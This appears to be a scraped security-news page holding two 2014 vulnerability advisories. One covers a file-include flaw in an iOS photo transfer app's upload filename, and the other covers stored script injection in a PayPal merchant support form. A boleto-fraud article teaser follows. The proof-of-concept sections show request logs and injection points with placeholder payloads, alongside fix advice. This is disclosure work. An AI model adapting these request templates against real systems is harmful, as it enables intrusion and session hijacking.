Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.


Request Method(s):
                                [+] [POST]

Vulnerable Module(s):
                                [+] uploadPhotoPost

Vulnerable Parameter(s):
                                [+] filename & albumname

Affected Module(s):
                                [+] Index Path Dir Listing (http://localhost/)


Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local wifi attackers in the network without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information or steps below to continue.


PoC: Url
http://localhost/./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]


PoC: Exploit Photo Transfer.htm

<div class="album-title">>"./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</div>
<a href="/group/1/0/100"><img class="album-overlay" alt="" width="140" height="160" src="/cvab-overlay.png">
<img class="album-thumb" width="90" height="90" alt="" src="/api/group/poster/1">                                    </a>
                       <!-- <div class="album-folder-img"><img alt="" width="140" height="160" src="/cvab.png"></div> -->
                    </div>
                </div>
            </div>
            <!--end of preview thumbnails -->
        </div>
        <!-- end of wrapper-->
        <div id="upload" class="wrapper">
            <div id="intro">
                <div class="col-1 padding-t20">
                    <!-- <h1><a href="/uploadPage"><img src="/upload.png" alt="" width="76" height="76"><br><br> -->
                    <!-- UPLOAD</a></h1> -->
                    <!-- <h2 class="center">Photos FROM This Computer</h2> -->
                </div>
            </div>
        </div>
        <!-- end of wrapper-->
        <div id="container">
            <div id="bg">
            </div>
        </div>
        <!-- end of container and background-->
        <div class="menu-bg ui-dark rad-0 center">
            <div class="logo">
                <a href="/groups">Photo Transfer +</a></div>
        </div>
        <!-- menu -->
    </body>
</html>
</iframe></div>



--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE  ] Größe des Inhalts[7] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost/uploadpage]
      Content-Length[818]
      Content-Type[multipart/form-data; boundary=---------------------------4611772826829]
      Cookie[plupload_ui_view=thumbs]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      POST_DATA[-----------------------------4611772826829
Content-Disposition: form-data; name="name"

./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png
-----------------------------4611772826829
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
Content-Type: image/png


Status: 200[OK]
GET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost/uploadpage]
      Cookie[plupload_ui_view=thumbs]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[210]
      Connection[keep-alive]
      Date[Tue, 16 Sep 2014 15:07:38 GMT]



Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure parse and encode of the file name value in the upload POST method request or sync.
Encode the file dir listing names and data output values to prevent further file include attacks. Restrict the file name extension validation
to fully secure the upload mechanism.


Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value of the application is estimated as high.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability

September 26, 2014, 4:25 am

≫ Next: Attacks against Boletos

≪ Previous: GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability

$

0

0

Document Title:
===============
Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=660


Release Date:
=============
2014-09-18


Vulnerability Laboratory ID (VL-ID):
====================================
660


Common Vulnerability Scoring System:
====================================
3.2


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encodign web vulnerability in the official PayPal Inc merchant online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-18:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability is detected in the official Paypal Inc Merchant website application (Customer/Pro/Seller).
The vulnerability allows remote attackers to inject own malicious script codes to compromise the application-side of the online-service.

The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent) of the paypal merchant web service.
The vulnerability is located in the `Frage Sie uns > Frage übermitteln` module with the connected vulnerable data listing value. The issue is remote
exploitable and the request method to inject the malicious payload is POST.


Exploitation of the vulnerability requires a low privileged application user account and low or medium user interaction. Successful exploitation
of the vulnerability can lead to session hijacking, persistent phishing, persistent external redirects to malicious source and persistent
manipulation of affected or connected module web context.

Request Method(s):
                        [+] POST
Vulnerable Type(s):
                        [+] Paypal Merchant Accounts

Vulnerable Site(s):
                        [+] Paypal Merchant Technical Support (ppmts.custhelp.com/app/ask)

Vulnerable Module(s):
                        [+] Frage Sie uns > Frage übermitteln

Vulnerable Parameter(s):
                        [+] data

Affected Section(s):
                        [+] Notification Mail - Listing Account


Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote attackers with low or medium required user inter action.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Review:  Notification Mail - Listing Account

<tbody><tr><td colspan="2" bgcolor="#E0E0E0"><b> Fragereferenznummer:120711-000465</b></td></tr>
<tr><td colspan="2"><table cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td class="label" align="right" nowrap="nowrap" width="250px"><b>Übersicht: </b></td>
<td class="data">">"<[PERSISTENT INJECTED SCRIPT CODE])' <<="" td=""></tr>
<tr><td class="label" align="right" width="250px" nowrap><b>Produktebene 1: </b></td>
<td class="data">Magento</td></tr><tr><td class="label" align="right" width="250px" nowrap><b>Erstellungsdatum: &l

URL: https://ppmts.custhelp.com/app/ask

NOTE: NOT ONLY THE USER IS AFFECTED BY THE NOTIFICATION ALSO THE WATCHER IN THE BACKEND OF THE APPLICATION SERVICE.


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the input in the `Frage Stellen` module. To prevent executions it is also required to parse and
encode the vulnerable `data` value. The issue has been resolved by paypal inc.

Security Risk:
==============
The security risk of the persistent input validation mail encoding vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Attacks against Boletos

September 26, 2014, 9:17 am

≫ Next: Scammers Offer Up “Steam Wallet Codes”

≪ Previous: Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability

$

0

0

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline.  However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

more here..............http://securelist.com/analysis/publications/66591/attacks-against-boletos/